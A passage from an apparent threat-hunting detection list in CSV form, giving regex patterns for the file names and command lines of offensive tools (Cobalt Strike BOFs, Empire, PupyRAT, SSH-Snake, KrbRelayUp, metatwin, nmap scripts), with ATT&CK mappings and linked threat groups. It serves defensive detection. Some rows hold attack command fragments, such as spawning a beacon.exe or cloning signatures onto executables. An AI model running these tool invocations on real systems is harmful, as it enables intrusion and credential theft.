T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","3270" "* snaffler.py *",".{0,1000}\ssnaffler\.py\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","3271" "* Snake.sh *",".{0,1000}\/Snake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#linux","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","3272" "* Snake.sh*",".{0,1000}\sSnake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","3273" "* sniffer.py*",".{0,1000}\ssniffer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","3274" "* sniffer-detect.nse*",".{0,1000}\ssniffer\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3275" "* SnifferSpoofer*",".{0,1000}\sSnifferSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","3276" "* 
snmp-brute.nse*",".{0,1000}\ssnmp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3277" "* snmp-hh3c-logins.nse*",".{0,1000}\ssnmp\-hh3c\-logins\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3278" "* snmp-info.nse*",".{0,1000}\ssnmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3279" "* snmp-interfaces.nse*",".{0,1000}\ssnmp\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3280" "* snmp-ios-config.nse*",".{0,1000}\ssnmp\-ios\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3281" "* snmp-netstat.nse*",".{0,1000}\ssnmp\-netstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3282" "* snmp-processes.nse*",".{0,1000}\ssnmp\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3283" "* snmp-sysdescr.nse*",".{0,1000}\ssnmp\-sysdescr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3284" "* snmp-win32-services.nse*",".{0,1000}\ssnmp\-win32\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3285" "* snmp-win32-shares.nse*",".{0,1000}\ssnmp\-win32\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3286" "* snmp-win32-software.nse*",".{0,1000}\ssnmp\-win32\-software\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3287" "* snmp-win32-users.nse*",".{0,1000}\ssnmp\-win32\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3288" "* snsenum.py*",".{0,1000}\ssnsenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","3289" "* SOAPHound.ADWS*",".{0,1000}\sSOAPHound\.ADWS.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","3290" "* SocialBox.sh*",".{0,1000}\sSocialBox\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","3291" "* socks5proxy.py*",".{0,1000}\ssocks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - 
T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","3293" "* socks-auth-info.nse*",".{0,1000}\ssocks\-auth\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3294" "* socks-brute.nse*",".{0,1000}\ssocks\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3295" "* socks-open-proxy.nse*",".{0,1000}\ssocks\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3296" "* -Source c:\windows\*.exe -Target *.exe -Sign*",".{0,1000}\s\-Source\sc\:\\windows\\.{0,1000}\.exe\s\-Target\s.{0,1000}\.exe\s\-Sign.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","3298" "* -Source c:\windows\system32\*.dll -Target *.exe -Sign*",".{0,1000}\s\-Source\sc\:\\windows\\system32\\.{0,1000}\.dll\s\-Target\s.{0,1000}\.exe\s\-Sign.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","3299" "* spawn C:\Windows\Temp\beacon.exe*",".{0,1000}\sspawn\sC\:\\Windows\\Temp\\beacon\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","3300" "* spawn C:\Windows\Temp\loader.exe*",".{0,1000}\sspawn\sC\:\\Windows\\Temp\\loader\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","3301" "* spawn -m adcs -d * -dc *",".{0,1000}\sspawn\s\-m\sadcs\s\-d\s.{0,1000}\s\-dc\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","3302" "* spawn -m shadowcred -d *",".{0,1000}\sspawn\s\-m\sshadowcred\s\-d\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - 
T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","3303" "* spawn.x64.c*",".{0,1000}\sspawn\.x64\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/boku7/spawn","1","0","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","3304" "* spawn.x64.o*",".{0,1000}\sspawn\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/spawn","1","0","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","3305" "* 
spawnto_x64 *",".{0,1000}\sspawnto_x64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","3306" "* spawnto_x86 *",".{0,1000}\sspawnto_x86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","3307" "* spellgen.py *",".{0,1000}\sspellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","3308" "* spellstager.py *",".{0,1000}\sspellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","3309" "* spinningteacup.py*",".{0,1000}\sspinningteacup\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3310" "* -spn cifs* -session * -clsid * -secrets*",".{0,1000}\s\-spn\scifs.{0,1000}\s\-session\s.{0,1000}\s\-clsid\s.{0,1000}\s\-secrets.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","3311" "* -spn cifs/* 